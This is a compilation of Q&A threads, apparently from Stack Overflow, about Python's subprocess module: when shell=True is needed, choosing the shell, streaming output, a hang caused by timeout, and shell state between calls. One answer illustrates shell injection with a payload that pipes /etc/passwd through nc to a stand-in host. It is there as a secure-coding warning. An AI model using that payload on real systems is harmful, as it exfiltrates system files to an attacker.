Launch linux command via python subprocess doesn't work as expected - python

I'm trying to kill a specific python process launched earlier, lets call it test.py.
The command in linux which terminates it is : sudo pkill -f test.py-> works like a charm.
However when trying to launch via python code:
subprocess.Popen('sudo pkill -f test.py', stdout=subprocess.PIPE)
I get a stacktrace with OSError: [Errno 2] No such file or directory
Any idea what am I doing wrong?

By default, subprocess.Popen will interpret a string argument as the exact command name. So, you pass a string foo bar, it will attempt to locate an executable named foo bar and invoke it without arguments. Unlike an interactive shell, it will not execute the command foo with the single argument bar.
When you type foo "bar baz" or foo | bar into a shell, it is the shell that splits the argument line into words and interprets those words as command name, arguments, pipe delimiters, redirection operators, etc. The simplest way for subprocess.Popen to do this kind of input interpretation same is by using shell=True to request that the argument be passed through a shell:
subprocess.Popen('sudo pkill -f test.py', shell=True, stdout=subprocess.PIPE)
Unfortunately, as noted in the documentation, this convenient shortcut has security implications. Using shell=True is safe as long as the command to run is fixed (and ignoring the obvious security implications of allowing apparently password-less sudo.) The problem arises when the arguments are assembled from pieces that come from other sources. For example:
# XXX security risk
subprocess.Popen('sudo pkill -f %s' % socket.read(), shell=True,
stdout=subprocess.PIPE)
Here we are reading the argument from a network connection, and splicing it into a string passed to the shell. Aside from the obvious problem of a maliciously crafted peer being able to kill an arbitrary process on the system (as root, no less), it is actually worse than that. Since the shell is a general tool, an attacker can use command substitution and similar features to make the system do anything it wants. For example, if the socket sends the string $(cat /etc/passwd | nc SOMEHOST; echo process-name), the Popen above will use the shell to execute:
sudo pkill -f $(cat /etc/passwd | nc SOMEHOST; echo process-name)
This is why it is generally advised not to use shell=True on untrusted input. A safer alternative is to avoid running the shell:
# smaller risk
cmd = ['sudo', 'pkill', '-f', socket.read()]
subprocess.Popen(cmd, stdout=subprocess.PIPE)
In this case, even if a malicious peer slips something weird into the string, it will not be a problem because it will be literally sent to the command to execute. In the above example, the pkill command would get a request to kill a process named $(cat ...), but there would be no shell to interpret this request to execute the command inside the parentheses.
Even without a shell, invocation of external commands with untrusted input can still be unsafe in case the command executed (in this case sudo or pkill) is itself vulnerable to injection attacks.

Related

subprocess.call() exec command in bash but I'm using zsh?

Im using Ubuntu 20 with zsh. When I using subprocess.call, it always using bash to exec command but not zsh. How should I do to fix this?
No, it uses sh regardless of which shell is your login shell.
There is a keyword argument to select a different shell, but you should generally run as little code as possible in a subshell; mixing nontrivial shell script with Python means the maintainer has to understand both languages.
whatever = subprocess.run(
'echo $SHELL',
shell=True, executable='/usr/bin/zsh',
check=True)
(This will echo your login shell, so the output would be /usr/bin/zsh even if you ran this without executable, or with Bash instead.)
In many situations, you should avoid shell=True entirely if you can.

Run shell commands with subprocess while displaying full messages

I want to run multiple Terminal commands from Python using subprocess and simultaneously not only execute the commands but also print the output that appears in Terminal in full to my stdout, so I can see it in real-time (as I would if making the commands directly in Terminal).
Now, using the advice here I was able to run multiple Bash commands from Python:
def subprocess_cmd(command):
process = subprocess.Popen(command,stdout=subprocess.PIPE, shell=True)
proc_stdout = process.communicate()[0].strip()
print(proc_stdout)
subprocess_cmd('echo a; echo b; cd /home/; ls')
Output:
b'a\nb\n<Files_in_my_home_folder>'
So far so good. But if I try to run ls -w (which should raise an error),
subprocess_cmd('echo a; echo b; cd /home/; ls -w')
output:
b'a\nb'
whereas the error message should be shown as it would in Terminal:
ls: option requires an argument -- 'w'
Try 'ls --help' for more information.
I would like to print out whatever is in Terminal (simultaneously with running the command) for whatever the command is, be it running some executable, or a shell command like ls.
I am using Python 3.7+ so any solution using subprocess.run or similar is also welcome. However, I'm not sure this takes multiple commands together nor does using capture_output=True, text=True print error messages.
The stdout=subprocess.PIPE (or the shorthand capture_output=True which subsumes this and a few related settings) says that you want Python to read the output. If you simply want the subprocess to spill whatever it prints directly to standard output and/or standard error, you can simply leave out this keyword argument.
As always, don't use Popen if you can avoid it (and usually avoid shell=True if you can, though that is not possible in your example).
subprocess.check_call('echo a; echo b; cd /home/; ls', shell=True)
To briefly reiterate, this bypasses Python entirely, and lets the subprocess write to its (and Python's) standard output and/or standard error without Python's involvement or knowledge. If you need for Python to know what's printed, you'll need to have your script capture it, and have Python print it if required.

subprocess.communicate() mysteriously hangs only when run from a script

I am invoking a Python tool called spark-ec2 from a Bash script.
As part of its work, spark-ec2 makes several calls to the system's ssh command via use of the subprocess module.
Here's an example:
s = subprocess.Popen(
ssh_command(opts) + ['-t', '-t', '-o', 'ConnectTimeout=3',
'%s#%s' % (opts.user, host), stringify_command('true')],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT # we pipe stderr through stdout to preserve output order
)
cmd_output = s.communicate()[0] # [1] is stderr, which we redirected to stdout
For some reason, spark-ec2 is hanging on that line where communicate() is called. I have no idea why.
For the record, here is an excerpt that shows how I'm invoking spark-ec2:
# excerpt from script-that-calls-spark-ec2.sh
# snipped: load AWS keys and do other setup stuff
timeout 30m spark-ec2 launch "$CLUSTER_NAME" ...
# snipped: if timeout, report and exit
What's killing me is that when I call spark-ec2 alone it works fine, and when I copy and paste commands from this Bash script and run them interactively they work fine.
It's only when I execute the whole script like this
$ ./script-that-calls-spark-ec2.sh
that spark-ec2 hangs on that communicate() step. This is driving me nuts.
What's going on?
This is one of those things that, once I figured it out, made me say "Wow..." out loud in a mixture of amazement and disgust.
In this case, spark-ec2 isn't hanging because of some deadlock related to the use of subprocess.PIPE, as might've been the case if spark-ec2 had used Popen.wait() instead of Popen.communicate().
The problem, as hinted to by the fact that spark-ec2 only hangs when the whole Bash script is invoked at once, is caused by something that behaves in subtly different ways depending on whether it's being called interactively or not.
In this case the culprit is the GNU coreutils utility timeout, and an option it offers called --foreground.
From the timeout man page:
--foreground
when not running timeout directly from a shell prompt,
allow COMMAND to read from the TTY and get TTY signals; in this
mode, children of COMMAND will not be timed out
Without this option, Python's communicate() cannot read the output of the SSH command being invoked by subprocess.Popen().
This probably has something to do with SSH allocating TTYs via the -t switches, but honestly I don't fully understand it.
What I can say, though, is that modifying the Bash script to use the --foreground option like this
timeout --foreground 30m spark-ec2 launch "$CLUSTER_NAME" ...
makes everything work as expected.
Now, if I were you, I would consider converting that Bash script into something else that won't drive you nuts...

How to run port lookup command in python subprocess

I am using terminal command
while ! echo exit | nc 10.0.2.11 9445; do sleep 10; done
in my commandline to lookup port in my remote machine.( it is working fine). I want to do this operation inside my python script. I found subprocess and I want to know that how can I do this with subprocess ?
from subprocess import call
call(["while xxxxxxxxxxxxxxxxxxxxxxxxxxx"])
subprocess.call does not by default use a shell to run its commands. Therefore, things like while are unknown commands. Instead, you could pass shell=True to call (security risk with dynamic data and user input*) or call the shell directly (the same advice applies):
from subprocess import call
call("while ! echo exit | nc 10.0.2.11 9445; do sleep 10; done", shell="True")
or directly with the shell, this is (a) less portable (because it assumes a specific shell) and (b) more secure (because you can specify what shell is to be used as syntax is not unified over different shells, e.g. csh vs. bash, and usage on other shells may lead to undefined or unwanted behaviour):
from subprocess import call
call(["bash", "-c", "while ! echo exit | nc 10.0.2.11 9445; do sleep 10; done"])
The exact argument to the shell to execute a command (here -c) depends on your shell.
You may want to have a look at the subprocess docs, especially for other ways of invoking processes. See e.g. check_call as a way of checking the return code for success, check_output to get the standard output of the process and Popen for advanced input/output interaction with the process.
Alternatively, you could use os.system, which implicitly launches a shell and returns the return code (subprocess.check_call with shell=True is a more flexible alternative to this)
* This link is to the Python 2 docs instead of the Python 3 docs used otherwise because it better outlines the security problems

Persistent Terminal Session in Python

I may not at all understand this correctly, but I am trying to allow a Python program to interface with a subprocess that runs commands as if on a Linux shell.
For example, I want to be able to run "cd /" and then "pwd later in the program and get "/".
I am currently trying to use subprocess.Popen and the communicate() method to send and receive data. The first command, sent with the Popen constructor, runs fine and gives proper output. But I cannot send another command via communicate(input="pwd").
My code so far:
from subprocess i
term=Popen("pwd", stdout=PIPE, stdin=PIPE)
print(flush(term.communicate()))
term.communicate(input="cd /")
print(flush(term.communicate(input="pwd")))
Is there a better way to do this? Thanks.
Also, I am running Python 3.
First of all, you need to understand that running a shell command and running a program aren't the same thing.
Let me give you an example:
>>> import subprocess
>>> subprocess.call(['/bin/echo', '$HOME'])
$HOME
0
>>> subprocess.call(['/bin/echo $HOME'], shell=True)
/home/kkinder
0
Notice that without the shell=True parameter, the text of $HOME is not expanded. That's because the /bin/echo program doesn't parse $HOME, Bash does. What's really happening in the second call is something analogous to this:
>>> subprocess.call(['/bin/bash', '-c', '/bin/echo $HOME'])
/home/kkinder
0
Using the shell=True parameter basically says to the subprocess module, go interpret this text using a shell.
So, you could add shell=True, but then the problem is that once the command finishes, its state is lost. Each application in the stack has its own working directory. So what the directory is will be something like this:
bash - /foo/bar
python - /foo
bash via subprocess - /
After your command executes, the python process's path stays the same and the subprocess's path is discarded once the shell finishes your command.
Basically, what you're asking for isn't practical. What you would need to do is, open a pipe to Bash, interactively feed it commands your user types, then read the output in a non-blocking way. That's going to involve a complicated pipe, threads, etc. Are you sure there's not a better way?

Categories